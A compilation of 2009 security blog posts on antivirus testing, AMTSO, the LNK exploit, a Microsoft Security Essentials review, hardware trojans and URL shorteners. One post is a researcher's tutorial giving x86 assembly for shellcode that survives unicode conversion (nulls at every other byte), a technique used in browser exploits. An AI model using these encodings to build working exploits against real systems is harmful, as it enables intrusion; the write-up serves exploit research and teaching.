REVIEW: “The Myths of Security”, John Viega

BKMTHSEC.RVW   20091221

“The Myths of Security”, John Viega, 2009, 978-0-596-52302-2, U$29.99/C$37.99
%A   John Viega
%C   103 Morris Street, Suite A, Sebastopol, CA   95472
%D   2009
%G   978-0-596-52302-2 0-596-52302-5
%I   O’Reilly & Associates, Inc.
%O   U$29.99/C$37.99 800-998-9938 fax: 707-829-0104
%O   Audience i Tech 1 Writing 1 (see revfaq.htm for explanation)
%P   238 p.
%T   “The Myths of Security”

The foreword states that McAfee does a much, much better job of security than other companies.  The preface states that computer security is difficult, that people, particularly computer users, are uninformed about computer security, and that McAfee does a much better job of security than other companies.  The author also notes that it is much more fun to write a book that is simply a collection of your opinions than one which requires work and technical accuracy.

The are forty-eight “chapters” in the book, most only two or three pages long.  As you read through them, you will start to notice that they are not about information security in general, but concentrate very heavily on the antivirus (AV) field.

After an initial point that most technology has a poor user interface, a few more essays list some online dangers.  Viega goes on to note a number of security tools which he does not use, himself.  He then argues unconvincingly that free antivirus software is not a good
thing, unclearly that Google is evil, and incompletely that AV software doesn’t work.  (I’ve been working in the antivirus research field for a lot longer than the author, and I’m certainly very aware that there are problems with all forms of AV: but there are more forms of AV in heaven and earth than are dreamt of in his philosophy.  By the way, John, Fred Cohen listed all the major forms of AV technology more than twenty-*five* years ago.)  The author subsequently jumps from this careless technical assessment to a very deeply technical discussion of the type of hashing or searching algorithms that AV companies should be using.  And thence to semi-technical (but highly opinionated) pieces on how disclosure, or HTTPS, or CAPTCHA, or VPNs have potential problems and therefore should be destroyed.  Eventually all pretence at analysis runs out, and some of the items dwindle down to three or four paragraphs of feelings.

For those with extensive backgrounds in the security field, this work might have value.  Not that you’ll learn anything, but that the biases presented may run counter to your own, and provide a foil to test your own positions.  However, those who are not professionals in the field might be well to avoid it, lest they become mythinformed.

copyright Robert M. Slade, 2009    BKMTHSEC.RVW   20091221


Reflections on Trusting Trust goes hardware

A recent Scientific American article does point out that is is getting increasingly difficult to keep our Trusted Computing Base sufficiently small.

For further information on this scenario, see:  [1]

We actually discussed this in the early days of virus research, and sporadically since.  The random aspect (see Dell problems with bad chips) (the stories about malware on the boards is overblown, since the malware was simply stored in unused memory, rather than being in the BIOS or other boot ROM) is definitely a problem, but a deliberate attack is problematic.  The issue lies with hundreds of thousands of hobbyists (as well as some of the hackers) who poke and prod at everything.  True, the chance of discovering the attack is random, but so is the chance of keeping the attack undetected.  It isn’t something that an attacker could rely upon.

Yes, these days there are thousands of components, being manufactured by hundreds of vendors.  However, note various factors that need to be considered.

First of all, somebody has to make it.  Most major chips, like CPUs, are a combined effort.  Nobody would be able to make and manufacture a major chip all by themselves.  And, in these days of tight margins and using every available scrap of chip “real estate,” someone would be bound to notice a section of the chip labeled “this space intentionally left blank.”  The more people who are involved, the more likely someone is going to spill the beans, at the very least about an anomaly on the chip, whether or not they knew what it did.  (Once the word is out that there is an anomaly, the lifespan of that secret is probably about three weeks.)

Secondly, there is the issue of the payload.  What can you make it do?  Remember, we are talking components, here.  This means that, in order to make it do anything, you are generally going to have to rely on whatever else is in the device or system in which your chip has been embedded.  You cannot assume that you will have access to communications, memory, disk space, or pretty much anything else, unless you are on the CPU.  Even if you are on the CPU, you are going to be limited.  Do you know what you are?  Are you a computer? Smartphone?  iPod?  (If the last, you are out of luck, unless you want to try and drive the user slowly insane by refusing to play anything except Barry Manilow.)  If you are a computer, do you know what operating system you are running?  Do you know the format of any disk connected to you?  The more you have to know how to deal with, the more programming has to be built into you, and remember that real estate limitation.  Even if all you are going to do is shut down, you have to have access to communications, and you have to a) be able to watch all the traffic, and b) watch all the traffic, without degrading performance while doing so.  (OK, true, it could just be a timer.  That doesn’t allow the attacker a lot of control.)

Next, you have to get people to use your chips.  That means that your chips have to be as cheap as, or cheaper than, the competition.  And remember, you have to use up chip real estate in order to have your payload on the chip.  That means that, for every 1% of chip space you use up for your programming, you lose 1% of manufacturing capacity.  So you have to have deep pockets to fund this.  Your chip also has to be at least as capable as the competition.  It also has to be as reliable as the competition.  You have to test that the payload you’ve put in place does not adversely affect performance, until you tell it to.  And you have to test it in a variety of situations and applications.  All the while making sure nobody finds out your little secret.

Next, you have to trigger your attack.  The trigger can’t be something that could just happen randomly.  And remember, traffic on the Internet, particularly with people streaming videos out there, can be pretty random.  Also remember that there are hundreds of thousands of kids out there with nothing better to do than try to use their computers, smartphones, music players, radio controlled cars, and blenders in exactly the way they aren’t supposed to.  And several thousand who, as soon as something odd happens, start trying to figure out why.

Bad hardware definitely is a threat.  But the largest part of that threat is simply the fact that cheap manufacturers are taking shortcuts and building unreliable components.  If I was an attacker, I would definitely be able to find easier ways to mess up the infrastructure than by trying to create attack chips.

[1] Get it some night when you can borrow it, for free, from your local library DVD collection.  On an evening when you don’t want to think too much.  Or at all.  WARNING: contains jokes that six year olds, and most guys, find funny.


Microsoft LNK exploit

The recently discovered LNK exploit; using the way Microsoft parses link or shortcut icons for display in order to get something else executed; may be a tempest in a teapot.  It is technically sophisticated, but so far we don’t appear to have seen it used widely.

Probably a good thing.

This exploit could be used in a wide variety of ways.  You can use it in removeable media, so that any time you shove a CD in a drive, or connect a USB stick/thumb drive (or any other USB device, for that matter) to a computer, it results in an infection or some malicious payload.

And remember that OLE stands for object *LINKING* and embedding.  Since it is trivially easy to embed a virus in any Windows OLE format data file, it should be just as easy to create malicious links in any such files.

Microsoft’s own information on the issue seems to indicate that there is a related, but separate, issue with Microsoft Office components, related to Web based activities.  (By the way, when accessing that site, the information about how to protect against the exploit is hidden under the “Workarounds” link, rather than being explicit on the page.)

Some of the potential effects are discussed by Randy Abrams at


Conspiracy Theory

After a while (about 20 years in my case) around the anti-malware industry (the last couple of years actually in it…), you get used to the idea that everyone expects the worst of them… errrr, us:

  • hype and extreme marketing
  • FUD
  • incompetence
  • putting our bottom line above the public well-being
  • bad hygiene

Maybe the last one is a bit paranoid.

Still, we have a bad rep. And the popular myth that AV companies run AMTSO (the Anti-Malware Testing Standards Organization) purely for their own aggrandizement and marketing advantage has some of its origins in that universal mistrust of AV.

If you buy into all that, then you’ll also assume that when five AV researchers, all from different companies, collaborate on a blog that responds to the recent attacks on AMTSO, that’s proof of a conspiracy.

Actually, the AV industry is founded in co-operation: otherwise, your AV product would only ever catch the malware that company had seen in its own honeynets, been sent in by its customers, and so on. But apparently that’s a sign of bad intentions, too.

Whatever. If you’re interested in the blog, here are five places you should be able to find it.

(And for a somewhat related commentary,

Not speaking for AMTSO or the AV industry, and definitely not speaking for the testing industry or the media.


AMTSO Inside and Outside

God bless Twitter.

A day or two ago, I was edified by the sight of two journalists asking each other whether AMTSO (the Anti-Malware Testing Standards Organization) had actually achieved anything yet. Though one of them did suggest that the other might ask me. (Didn’t happen.)

Well, it’s always a privilege to see cutting edge investigative journalism in action. I know the word researcher is in my job title, but I normally charge for doing other people’s research. But since you’re obviously both very busy, and as a member of the AMTSO Board of Directors (NB, that’s a volunteer role) I guess I do have some insight here, so let me help you out, guys.

Since the first formal meeting of AMTSO in May 2008, where a whole bunch of testers, vendors, publishers and individuals sat down to discuss how the general standard of testing could be raised, the organization has approved and published a number of guidelines/best practices documents.

To be more specific:

The “Fundamental Principles of Testing” document is a decent attempt at doing what it says on the tin, and provide a baseline definition for what good testing is at an abstract level.

The Guidelines document provide… errrr, guidelines… in a number of areas:

  • Dynamic Testing
  • Sample Validation
  • In the Cloud Testing
  • Network Based Product Testing
  • Whole Product Testing
  • Performance Testing

Another document looks at the pros and cons of creating malware for testing purposes.

The analysis of reviews document provides a basis for the review analysis process which has so far resulted in two review analyses – well, that was a fairly painful gestation process, and in fact, there was a volatile but necessary period in the first year in particular while various procedures, legal requirements and so on were addressed. There are several other papers in process being worked on

A fairly comprehensive links/files repository for testing-related resources was established here and new resources added, from AMTSO members and others.

Unspectacular, and no doubt journalistically uninteresting. But representing a lot of volunteer work by people who already have full time jobs.

You don’t have to agree with every sentence of every document: the point is that these documents didn’t exist before, and they go some way towards meeting the needs of those people who want to know more about testing, whether as a tester, tester’s audience, producer of products under test, or any other interested party. Perhaps most importantly, the idea has started to spread that perhaps testers should be accountable to their customers (those who read their reviews) for the accuracy and fitness for purpose of their tests, just as security vendors are accountable to their own customers.

[Perhaps I’d better clarify that: I’m not saying that tests have to be or can be perfect, any more than products . (You might want 100% security or 100% accuracy, but that isn’t possible.)

You don’t have to like what AMTSO does. But it would be nice if you’d actually make an effort to find out what we do and maybe even consider joining (AMTSO does not only admit vendors and testers) before you moan into extinction an organization that is trying to do something about a serious problem that no-one else is addressing.

Not speaking for AMTSO


Examining malware will be illegal in Canada

We’ve got a new law coming up in Canada: C-32, otherwise known as DMCA-lite.

Lemme quote you a section:

29.22 (1) It is not an infringement of copyright for an individual to reproduce a work or other subject-matter or any substantial part of a work or other subject-matter if
(c) the individual, in order to make the reproduction, did not circumvent, as defined in section 41, a technological protection measure, as defined in that section, or cause one to be circumvented.

Now, of course, if you want to examine a virus, or other malware, you have to make a copy, right?  So, if the virus writer has obfuscated the code, say by doing a little simple encryption, obviously he was trying to use a “technological protection measure, as defined in that section,” right?  So, decrypting the file is illegal.

Of course, it’s been illegal in the US for some years, now …


KHOBE: Say hello to my little friend(*)

Guess what? You personal firewall/IDS/Anti Virus/(insert next month’s buzzword here) isn’t going to save you from an attacker successfully executing code remotely on your machine:

So no, it’s not the doomsday weapon, but definitely worthy of the Scarface quote in the title.
This isn’t surprising, researchers find ways to bypass security defenses almost as soon as those defenses are implemented (remember non-executable stack?). Eliminating vulnerabilities in the first place is the way to go, guys, not trying to block attacks hoping your ‘shields’ hold up.

(*) If you’re reading this out loud you need to do so in a thick cuban accent


The complexity of the end-user’s computer

Over the years I’ve had to learn a lot about computers.  I’ve written device drivers for the All-in-One system under Vax/VMS.  I know what to do with MS-DOS’s AUTOEXEC.BAT and CONFIG.SYS files.  I’ve learned more word processors than I can remember the names of.  I was using UNIX when that was still a big deal.  Because of some some research that was important in the early days of computer viruses I know a question that will stump any computer forensics expert on the witness stand.

I’m a little afraid of my new netbook.  Within a few months I’ll need to buy a new desktop, and I know I’m going to be more afraid of it.

In the DOS days, I knew pretty much everything that was going on in it.  I knew the hardware, and the system files.  I even had a bunch of tools that would let me see the raw disk and memory.  It was tedious to do so, but it was possible.

Even when Windows 3 and 95 came out, I understood that this was simply a new interface.  I could still examine the system, and make sure everything was as it should be.  I could have confidence and assurance in the computer.  True, there wasn’t any serious protection on it, but, since I knew the full system, I could examine it regularly and make sure that nothing untoward was happening.

Then came Windows NT.  Extra protection on the system, but suddenly every time you turned the system on, 400 files (a number of them system files) got modified.  Change detection lost its security.

Then the later members of that family started adding ties into applications and back again.  And with Windows XP, for the first time, when a friend’s computer got infected, the only solution was to re-install the system.

Complexity is the enemy of security.   However, this goes deeper.  These days we have huge numbers of people using devices that are, as far as they are concerned, magic.  Don’t get me wrong.  I think magic is a lot of fun.  It’s just that magic seems to be defined as inherently unknowable, and these users are not only content with, but actually proud of, their ignorance.

This is dangerous.  When you assume that you cannot know, that seems to absolve you of any responsibility for even trying.  You punch the icons, and do things with no understanding of the consequences.

At the moment, I am trying to set up an ad-hoc wireless network between some of my machines.  I’m not having much luck.  I’ve researched the process, and had suggestions from friends.  I’ve been working at it, off and on, for months.  It still isn’t working.  I can’t find the information I need, either on the process, or in regard to the actual settings on my machines.

Ignorance isn’t bliss.  It’s dangerous.  If I, as a computer, communications, and security specialist of decades of standing, can’t get a simple (well, not quite that simple) network set up, how can we give advice to the novice users of the world on how to keep themswelves safe?


Microsoft Security Essentials review (part 2)

My initial, and superficial, review of MSE is still sparking all kinds of comment.

Today it decided to update itself.  Didn’t ask, of course.  It just tied up the computer for about half an hour.  I was able to get some stuff done, as long as I was willing to wait ridiculous amounts of time for responses.


ASCII gone bad / Zer0-overflow

This post is a followup on my previous post on KISS shellcoding and exploitation. Like before this is part of the job I do for SecuriTeam’s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory )
The most common and classic shellcode char restrictions is “zero tolerance”. this can be solved in a verity of different methods. ranging from substitution to polymorphic escape decoders. Solving zero-tolerance is a very useful and thought-provoking problem, however provides a limited amount of fun:). especially once a basic set of solutions has been developed.

Let’s have a look at slightly more challenging problem – can we write shellcode that contains a null char at every other byte, and *only* every other byte, for e.g. s\x00h\x00e\x00l\x00l\x00c\x00o\x00d\x00e0

This can happen if our shellcode were to pass through a call to MultiByteToWideChar() or similar function. This is often encountered in browser bugs (especially DOM and/or scripting).

Some work has been done on this subject, namely a method was described by ngss reasercher Chris Anley. This method was coined “Venetian Blinds” or ”The Venetian exploit”. The method I suggest here is similar, but slightly different in that it does not make as many assumptions and presents a more theoretical approach. This work is an original unrelated effort.

Let us get to it.

Enumerating the methods we can use to write ugly ascii-to-unicode shellcode we find many are similar to regular zero-tolerance or ascii shellcode methods.

We can decode in-place, copy, byte-substitute. These methods will become more clear as you read. In some cases it will be necessary to find eip/getPC.

This also can be done in several ways, similarly to shown in my previous post, but differently( Try encoding FSTENV with null bytes, email me if you succeed :)

It will take many pages to thoroughly cover all of these methods and so I’ll start with the simplest copy method.

Instead of just presenting the final result, I will walk through my thought process working on this. In this post I present several different trials at shellcode, some of which are not immediately useful. This will allow you to better understand the intricacies shellcode-restriction, and get a feel for the different problems I faced.

Let’s copy our code somewhere. If we were to decode in-place, we would essentially write the same code, as well as extra getPC code.

Not as easy as it sounds. let us start from building restriction-compliant basic-blocks which can br used later. These blocks shall suffice:
1) set register
2) string operation
3) branch
4) glue block

These translate to:

1) mov reg32, imm32
2) mov [reg32],imm8
inc reg32 # imm8 !=0
3) jmp/call reg32
4) a “glue block” that can be use between every two blocks, and between two compliant opcodes. This is a compliant block that starts and ends with a null byte. we’ll mark it *GB.

if we want to get a bit fancier we may need:
3) pop reg32
4) mov [reg32],imm16 # imm16 bytes not equal 0
inc reg32
inc reg32

(U) basic block number one: setting a register – attempt 1.0
the following opcode:
mov ecx, 0×11223344
decodes like this:
B9 44332211

which of course is not very helpful to us. The best we can do with our restriction and this basic opcode is:
B9 00330011 == mov ecx, 0×11003300

this is not very useful. we want to be able to put an arbitrary value into r32. let’s divide in to two parts by bytes:

two lower bytes(“3rd and 4th”):let’s start by setting the two lower bytes. this is easy

*GB ; zero-out ecx
push 0
pop ecx

mov edx,77007700 BB00770077 ; use edx as help-reg

add ch,dh – 00F5 c
mov edx,66006600 – BB00660066.

add cl,dh – 00F1

This is a good method for the lower bytes. let’s call it “set (cx, 0×1122)”.

Those readers with a keen eye may notice that assembling these opcodes may not result in compliant shellcode.

This is because different byte-sequences may represent the same opcode. x86 opcodes are built of micro-codes or U-codes(with the greek letter mewh). Every Ucode performs a very basic operation. Several of these are dubbed “opcode”. Different sequences of Ucodes may result in the same end and therefore be functionally-equivalent, usually an assembler will choose the faster one.

topmost two bytes:
in order to set the topmost byte we can:

mov ecx,66006600 – BB00660066.

In order to set the topmost byte to zero we can: zero out the whole r32, later setting byte’s 3&4 . this is done by replacing our first opcode with the sequence:
push 0 – 6A00
pop ecx – 59


we are now able to set the 1st,3rd, and 4th bytes of a register. how will we set the second? if the value needed is very low or very high we could:
set (cx, 0xFFFF)

inc ecx – 41
set (cx, 0xFFFF)


set (cx, 0×0000) ; this is not trivial, but easy
DEC ecx – 41


This method is not very space-conservative. let’s try finding a better method.

And now for something completely different – let’s find a better method. This time the process will include taking a peak at the intel x86 reference manual (I used the xeon manual) in search for interesting opcode encodings.

(U) basic block number one: attempt 2.0 – setting the top two bytes.

this time, we’ll try using program memory, specifically – the stack. this may a good method because many stack operations are single-byte. this may be bad, if sp points somewhere unwritable when the shellcode is running(but can be adapted).

fun fact – sifting through the intel reference manual we can see that the set of operands al /ax /eax can provide plenty compliant opcodes which will not be compliant with other registers used. for eg:
MOV DWORD PTR DS:[EBX],110011 – C7 03 11 00 11 00
MOV DWORD PTR DS:[EAX],110011 – C7 00 11 00 11 00

now consider the following opcodes:
push 11003300 – 6800330011
push esp – 54
pop eax – 58
add dword ptr [eax], 00220044
pop ecx

now ecx == 0×11223344
this is better than we expected. we have set all four bytes.

we already know how to change the two lower-most bytes if we want to zero them out. we also know how to zero out the 2nd topmost byte,or both high bytes. if we want to get 0×00112233 we can use (i’m omitting opcode encoding from hereon):

push 11003300 ; [esp] = 11003300
push 11003300 ; [esp] = 11003300
inc esp ; [esp] = 00110033
pop ecx ; ecx = 00110033
dec esp ; [esp] = 11003300
pop eax ; to restore stack

and then set the missing low bytes. We already know a different way of doing this – look for it.

Thus we have a compact method of performing mov r32,imm32 for any value.

(U) basic block no. 2: mov [reg32],imm8, inc reg32 # imm8 !=0 – attempt 1.0

First, let’s assume we know what data is present at the copy destination address. In this case, it will be pretty easy to build this BB. We will be using an add operation. here we are adding 0×90 to a one byte at [ecx], and ecx++.

mov eax,90009000 ; ah=90
add byte ptr [ecx],ah ; [ecx] += 0×90
inc ecx

this of course will be padded with *GB whenever needed. if we don’t know what data lays at [ecx] we could try this:
push ecx
pop eax ; eax =ecx
mov byte ptr al,[eax] ; al= [ecx]

;negate eax
push 0
pop ebx
add bh,al ; bh =al == [ecx]
xor ebx, ff00ff00
push 0
pop eax;
add al,bh ; al = al ^ 0xff == [ecx]^0xff
inc al ; al++ == -(byte ptr [ecx] )

;add negated value, and wanted value
mov edx, 11001100
add al,dh
add byte ptr [ecx],al ; [ecx] = [ecx] + (-[ecx] + dh) == dh == 11
inc ecx

once again, padded with *GB. this is not very elegant or small, but seems to work nicely. let’s give it another try. this time using completely different types of opcodes:
push esp
pop edx

inc ecx
inc ecx
inc ecx
inc ecx

push ecx
pop esp

push ebx

push edx
pop esp

this looks nicer.

(U) 3) jmp/call reg32
this is easy:
push ecx

(U) 4) the star of the evening – our very own – Glue Block we could try this:

or this – after setting the right registers.

ADD BYTE PTR DS:[EAX],CL ; (we could probably pull eax off the stack, but can’t use set(eax,0xADDR) because we can’t use this GB, which is needed to do this there are probably a few others. Using these may require us to do minor fixups. this basically sums up everything we need to build a fancy ascii-to-shellcode decoder. now that we have our 4 basic blocks we can use them to program/ like this: 2-3-4-1-1-1-2-3-4-4/ just kidding. :)

An example simple windows code that copies four nop bytes to [7FFE0300 +0x100] looks like this:
what we would really be copying is a short code to find the original shellcode, and decode it. this is pretty simple straight-forward assembly

; ecx = 7FFE0400
68 0004007F PUSH 7F000400
8100 0100FE00 ADD DWORD PTR DS:[EAX],0FE0001

;al = 0×90

B8 00900090 MOV EAX,90009000

;byte ptr [ecx] = 0×90
;ecx ++

0001 ADD BYTE PTR DS:[ECX],AL; [ecx] = 0×90
41 INC ECX ;ecx++

;byte ptr [ecx] = 0×90
;ecx ++

0001 ADD BYTE PTR DS:[ECX],AL [ecx] = 0×90

;byte ptr [ecx] = 0×90
;ecx ++


;byte ptr [ecx] = 0×90
;ecx ++


;jmp [ecx-4]




Of course, all the methods I discussed here can be highly optimized(such using dword values?), and probably some other methods may be used. these are the basics :)

Also, if we want to keep a code-shellcode ratio anything close to plausible, we will have to be able to write small amount of bytes that can find the original chunk and decode it from our
destination address. this can very often be done through use of register and stack state at the time the shellocde started running. we’re in luck with this – pushad is compliant.


Mac Virus update

I know, there ain’t no such thing!

Well, we could have a lively debate on that topic, but not right now.

On this occasion, I’m just letting anyone who wonders what happened to the Mac Virus web site (, which I inherited from Susan Lesch some years ago, what’s happening with it. We have nothing to do with the cobwebby sites at and, or with, whatever that is.

The URL actually redirects to my own Mac page at Small Blue-Green World site, which now re-redirects to a WordPress page. If you want to go straight to the Mac Virus blog, you can go direct here. It’s still malware-oriented, of course, and, is likely to become more rather than less active in that area.

In fact, most of my Small Blue-Green World content now resides on blog pages. ESET content is still blogged at, of course, and AVIEN content is blogged at

Confused? Me too…

We now return you to your normal programming. Scheduling, that is, not coding. Unless that’s what you’re doing at the moment. Oh, never mind.

The next time I blog here, it will be about a proper security issue again. I hope.

Security Author/Consultant at Small Blue-Green World
Chief Operations Officer, AVIEN
ESET Research Fellow & Director of Malware Intelligence

Also blogging at:


A Fairy Tale

Withdrawn on legal advice. Sigh…

So I’m going to ask some hypothetical questions instead.

Principle 3 of the AMTSO (Anti-Malware Testing Standards Organization) guidelines document (—download—amtso-fundamental-principles-of-testing.html) states that “Testing should be reasonably open and transparent.”

The document goes on to explain what information on the test and the test methodology it’s reasonable to ask for.

So is it open and transparent for an anti-malware tester who claims that his tests are compliant with AMTSO guidelines to decline to answer a vendor’s questions or give any information about the reported performance of their product unless they buy a copy of the report or pay a consultancy fee to the tester?

There is, of course, nothing to stop an anti-malware tester soliciting payment from the vendors whose products have been tested both in advance of the test and in response to requests for further information. But is he then entitled to claim to be independent and working without vendor funding? In what respect is this substantially different to the way in which certification testing organizations work, for example?

It seems to me that AMTSO is going to have to consider those questions at its next meeting (in Prague, next week). Purely hypothetically, of course. What do you think?

Small Blue-Green World


Microsoft Security Essentials review

What with twenty years experience in reviewing AV software, I figured I’d better try it out.

It’s not altogether terrible.  The fact that it’s free, and from Microsoft (and therefore promoted), might reduce the total level of infections, and that would be a good thing.

But even for free software, and from Microsoft, it’s pretty weird.

When I installed it, I did a “quick” scan.

That ran for over an hour on a machine with a drive that’s got about 70 Gb of material on it, mostly not programs.  At that point I hadn’t found out that you can exclude directories (more on that later), so it found my zoo.  It deleted nine copies of Sircam.

Lemme tell ya ’bout my zoo.  It’s got over 1500 files in it.  There are a lot of duplicate files (hence the nine copies of Sircam), and there are files in there that are not malware.  There are files which have had the executable file extensions changed.  But there are a great number of common, executable, dangerous pieces of malware in there, and the only thing MSE found was nine copies of Sircam.

(Which it deleted.  Without asking.  Personally, for me, that’s annoying.  It means I have to repopulate my zoo from backups.  But for most users, that’s probably a good thing.)

Now, when I went to repopulate my zoo, I, of course, opened the zoo directory with Windows Explorer.  And all kinds of bells and whistles went off.  As soon as I “looked” at the directory, the real-time component of MSE found more than the quick scan did.  That probably means the real-time scanner is fairly decent.  (In my situation it’s annoying, so I turned it off.  MSE is now annoyed at me, and continues to be annoyed, with big red flags on my task bar.)
MSE has four alert levels to categorize what it finds, and you have some options for setting the default actions.  The alert levels are severe (options: “Recommended action,” “Remove,” and “Quarantine”), high (options: “Recommended action,” “Remove,” and “Quarantine”), medium (options: “Recommended action,” “Remove,” “Quarantine,” and “Allow”), and low (options: “Recommended action,” “Remove,” “Quarantine,” and “Allow”).  Initially, everything is set at “Recommended action.”  I turned everything down to the lowest possible settings: I want information, not strip mining.  However, for most people it would seem to be reasonable to keep it at the default action, which seems to be removal for everything.
I don’t know where it puts the quarantined stuff.  It does have a directory at C:\Documents and Settings\All Users\Application Data\Microsoft Security Essentials, but no quarantined material appears to be there.

(I did try to find out more.  It does have help functions.  If you click on the “Help” button, it sends you to this site.  However, if you click on the link to explain the actions and alert levels, it sends you to this site.  If you examine those two URLs, they are different.  If you click on them, you go to the same place.  At that location, you can get some pages that offer you marketing bumpf, or watch a few videos.  There isn’t much help.)
You can exclude specific files and locations.  Personally, I find that extremely useful, and the only reason that I’d continue using MSE.  It does seem to work: I excluded my zoo before I did a full scan, and none of my zoo disappeared when I did the full scan.  However, for most users, the simple existence of that option could signal a loophole.  If I was a blackhat, first thing I’d do is find out how to exclude myself from the scanner.  (There is also an option to exclude certain file types.)

So I did a full scan.  That took over eight hours.  I don’t know exactly how long it took, I finally had to give up and leave it running.  MSE doesn’t report how long it took to do a scan, it only reports what it found.  (I suspect the total run was around ten or eleven hours.  MSE reports that a full scan can take up to an hour.)

While MSE is running it really bogs down the machine.  According to task manager it doesn’t take up much in the way of machine cycles, but the computer sure isn’t responsive while it’s on.
When I came back and found it had finished, the first thing it wanted me to do was send a bunch of suspect files to Microsoft.  The files were all from my email.  On the plus side, the files were all messages that reported suspect malware or Websites, so it’s possible that we could say MSE is doing a good job in scanning files and examining archives.  (On the other hand, every single message was from Sunbelt Software.  This could be coincidence, but it is also a fact that Sunbelt makes competing AV software, and was formerly associated with a company that Microsoft bought in its race to produce AV and anti-spyware components.)

Then I started to go through what Microsoft said it found, in order to determine what I had lost.

The first item on the list was rated severe.  Apparently I had failed to notice six copies of the EICAR test file on my machine.

Excuse me?  The EICAR test file?  A severe threat?  Microsoft, you have got to be kidding.  And the joke is not funny.

The EICAR test file is a test file.  If anyone doesn’t know what it is, read about it at EICAR, or at Wikipedia if you don’t trust EICAR.  It’s harmless.  Yes, a compatible scanner will report it, but only to show that your scanner is, in fact, working.

It shouldn’t delete or quarantine all copies it finds on the machine.

MSE also said it quarantined fifteen messages from my email for having JavaScript shell code.  Unfortunately, it didn’t say what they were, and I wasn’t sure I could get them back.  I don’t know why they were deleted, or what the trigger was.  MSE isn’t too big on reporting details.  I don’t know whether these messages were simply ones that contained some piece of generic JavaScript, and got boosted up to “severe” level.  Given the EICAR test file experience, I’m not inclined to give Microsoft the benefit of the doubt.

After some considerable work, I did find them.  They seemed to be the “suspect” messages that Microsoft wanted.  And when I tried to recover them, I found that MSE had not quarantined them: they were left in place.  So, at the very least, at times MSE lies to you.

(I guess I’d better add my email directory to places for MSE not to scan.)
MSE quarantined some old DOS utilities.  It quarantined a bunch of old virus simulators (the ones that show you screen displays, not actual infectors).  (Called them weird names, too.)

MSE quarantined Gibson Research‘s DCOMbob.exe.  This is a tool for making sure that DCOM is disabled on your machine.  Since DCOM was the vector for the Blaster worm (among others), and is really hard to turn off under XP, I find this rather dangerous.

OK, final word is that I can use it.  I’ll want to protect certain areas before I do, but that shouldn’t be too much of a concern for most users.

You might want to make sure Microsoft isn’t reading your email …


WordPress: we are protecting your blog

As the WordPress team scramble around trying to resolve the latest set of security issues, and doing all the wrong things like giving their users a 14-step process for upgrade, the following Jewel came up:

4. WordPress is Not Secure: WordPress is incredibly secure and monitored constantly by experts in web security. This attack was well anticipated and so far, WordPress 2.8.4 is holding. If necessary, WordPress will immediately release a update with further security improvements. WordPress is used by governments, huge corporations, and me, around the world. Millions of bloggers are using Have faith they are working overtime to monitor this situation and protect your blog.

This is funny on so many levels.
(HT: Jericho, AKA security curmudgeon)


I am carrier

The swine flu craze in Asia is almost becoming ridiculous. Flying into Beijing a doctor came on board to check everyone’s temperature before they would let us out of the plane. Before passing immigration we were checked again and filled in forms to prove we are all in top health.

Ironically, on the inbound flight to Beijing I caught the flu from the Chinese girl sitting next to me (I’m talking about the regular flu. No need to call an emergency medical team on me). I spent the week gobbling Chinese medicine herbs which did a great job in preventing me from crashing sick. But the problem is that I am about to fly out back to San Francisco through Tokyo, and I’m trying to think how to convince the Narita officials that my germs are pure and genuine Asian bodies and are were not carried with me from any American pigs (political innuendos not intended).

It seems I’m also a carrier of something else, and again it’s not my fault. All I did was connect my USB stick to a computer on the business center in my Beijing hotel. I just wanted to print a document but didn’t bother locking the stick to ‘read only’. Apparently that was enough to have a Trojan infect the USB stick from the malware infested public computer.

Not that it would matter, really, since my machine runs Ubuntu. In fact, I wouldn’t have noticed it unless someone that borrowed the USB stick from me showed me the Virus warning that popped up as they plugged the stick into their Windows machine. I could have infected dozens of machines by the time I found out about it – all those poor Windows machine, Trojaned just for borrowing my USB stick; I really don’t need that on my conscience.

Once I know the Trojan is there, the cleanup is easy, I will ‘rm’ the files and the stick will be healthy again and stop be a carrier for defenseless Windows machines. Now if only it was that easy to recover from this damn flu.


To tinyurl or to, that is the question …

Dinosaur that I am, it never occurred to me that long URLs were a major problem.  Sure, I’d gotten lots that were broken, particularly after going through Web-based mailing lists.  But you could generally put them back together again with a few mouse clicks.  So what?

So the fact that there were actually sites that would allow you to proactively pre-empt the problem, by shortening the URL, came as a surprise.  What was even more of a surprise was that there were lots of them.  Go ahead.  Do a search on “+shorten +url” and see what you get.  Thousands.

I would not, by the way, advise visiting that last.  .cc is a domain used by those on the dark side.  In fact, I wouldn’t recommend visiting many of those: I have no idea where they came from, except that a search pops them up.  Which is part of the point.

Are URL shorteners a good thing?  Joshua Schachter says no.  Therefore, in opposition, Ben Parr says yes.  There are legitimate points to be made on both sides.  They add complexity to the process.  (Shorteners aren’t shorteners: they are redirectors.)  They make it easier to tweet (and marginally easier to email).  They disguise spam.  Some of the sites give you link use data.  They create another failure point.  They hide the fact that most Twitter users are, in fact, posting exactly the same link as 49,000 other Twitter users.

URL shorteners/redirectors are going to be used: that is a given.  Now that they here, they are not going away.  Those of pure heart and altruistic (or, at least, monetary only) motive will provide the services, have reasonable respect for privacy, and add functions such as those providing link use data to the originator (and, possibly, user).  A number of the sites will be set up to install malware on the originator’s machine, to preferentially try to break the Websites identified, to mine and cross-corelate URL and use data, and to redirect users to malicious sites.

If you are going to use them (and you are, I can tell), then choose wisely, grasshopper.  There are lots to choose from.  Choose sites that offer preview capabilities.  If someone doesn’t use the preview options, you can still add them. is the same as : you just have to add the “preview.” part. is even easier: just add a hyphen to the end of the shortened URL.  I’m hoping that one of the sites will start checking the database for already existing links, and returning the same “short form”: it’d make it easier to identify all the identical tweets.  (With the increasing use of the sites, it will also ensure that the hash space doesn’t expand too quickly, which would be to the advantage of the shortening sites.)